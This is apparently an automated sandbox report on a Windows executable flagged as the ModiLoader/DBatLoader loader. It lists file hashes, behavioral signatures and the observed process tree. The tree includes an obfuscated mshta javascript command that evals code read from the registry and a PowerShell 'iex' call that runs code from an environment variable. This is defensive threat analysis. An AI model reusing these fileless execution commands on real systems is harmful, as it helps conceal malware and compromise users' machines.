Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
188s -
max time network
193s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
11/10/2022, 13:50
Static task
static1
Behavioral task
behavioral1
Sample
659e2230ec6532edbdb07c4286dda568f31d8693760cefd1216f326fcbd663af.exe
Behavioral task
behavioral2
Sample
659e2230ec6532edbdb07c4286dda568f31d8693760cefd1216f326fcbd663af.exe
Resource
win10v2004-20220812-en
General
-
Target
659e2230ec6532edbdb07c4286dda568f31d8693760cefd1216f326fcbd663af.exe
-
Size
368KB
-
MD5
67d6382ea5ca9b2639cdb23866f45c79
-
SHA1
4a94eb49084446cefb9db775ba7fa0452a3e4afe
-
SHA256
659e2230ec6532edbdb07c4286dda568f31d8693760cefd1216f326fcbd663af
-
SHA512
09eef1d438aee77854826e1fbd07f83b67e9620ca10a5af0d756456a822aa2a9c03a6d181c15f9ac511d87f0151643a83ec991438aba8878f2696acd751ff5ab
-
SSDEEP
6144:iHhS4AwWPUAEibLJl7UO7Sg9csjq41rNA3hyGMghRaoK4tyZg2ZLX/MAq+gMl7C:iBjANUAx3j7UV4/AxThooK0yZZ9/Lq+c
Malware Config
Signatures
-
ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2796 2156 mshta.exe 31 -
ModiLoader Second Stage 3 IoCs
resource yara_rule behavioral2/memory/5020-133-0x0000000000400000-0x0000000000462000-memory.dmp modiloader_stage2 behavioral2/memory/5020-136-0x0000000000060000-0x0000000000120000-memory.dmp modiloader_stage2 behavioral2/memory/5020-144-0x0000000000060000-0x0000000000120000-memory.dmp modiloader_stage2 -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation mshta.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 4084 powershell.exe 4084 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 4084 powershell.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 5020 659e2230ec6532edbdb07c4286dda568f31d8693760cefd1216f326fcbd663af.exe 5020 659e2230ec6532edbdb07c4286dda568f31d8693760cefd1216f326fcbd663af.exe -
Suspicious use of SendNotifyMessage 2 IoCs
pid Process 5020 659e2230ec6532edbdb07c4286dda568f31d8693760cefd1216f326fcbd663af.exe 5020 659e2230ec6532edbdb07c4286dda568f31d8693760cefd1216f326fcbd663af.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 2796 wrote to memory of 4084 2796 mshta.exe 82 PID 2796 wrote to memory of 4084 2796 mshta.exe 82 PID 2796 wrote to memory of 4084 2796 mshta.exe 82
Processes
-
C:\Users\Admin\AppData\Local\Temp\659e2230ec6532edbdb07c4286dda568f31d8693760cefd1216f326fcbd663af.exe"C:\Users\Admin\AppData\Local\Temp\659e2230ec6532edbdb07c4286dda568f31d8693760cefd1216f326fcbd663af.exe"1⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5020
-
C:\Windows\system32\mshta.exe"C:\Windows\system32\mshta.exe" javascript:IZPvXY1="RNJuxt";d7k=new%20ActiveXObject("WScript.Shell");CxxfG7oe="2DdkeE";It1jH2=d7k.RegRead("HKLM\\software\\Wow6432Node\\N0JiJTc1\\L0euKr");o0HcgDH="Vd";eval(It1jH2);cErvbt4P="e5IKaZ7Mn";1⤵
- Process spawned unexpected child process
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2796 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:jocjzbu2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4084
-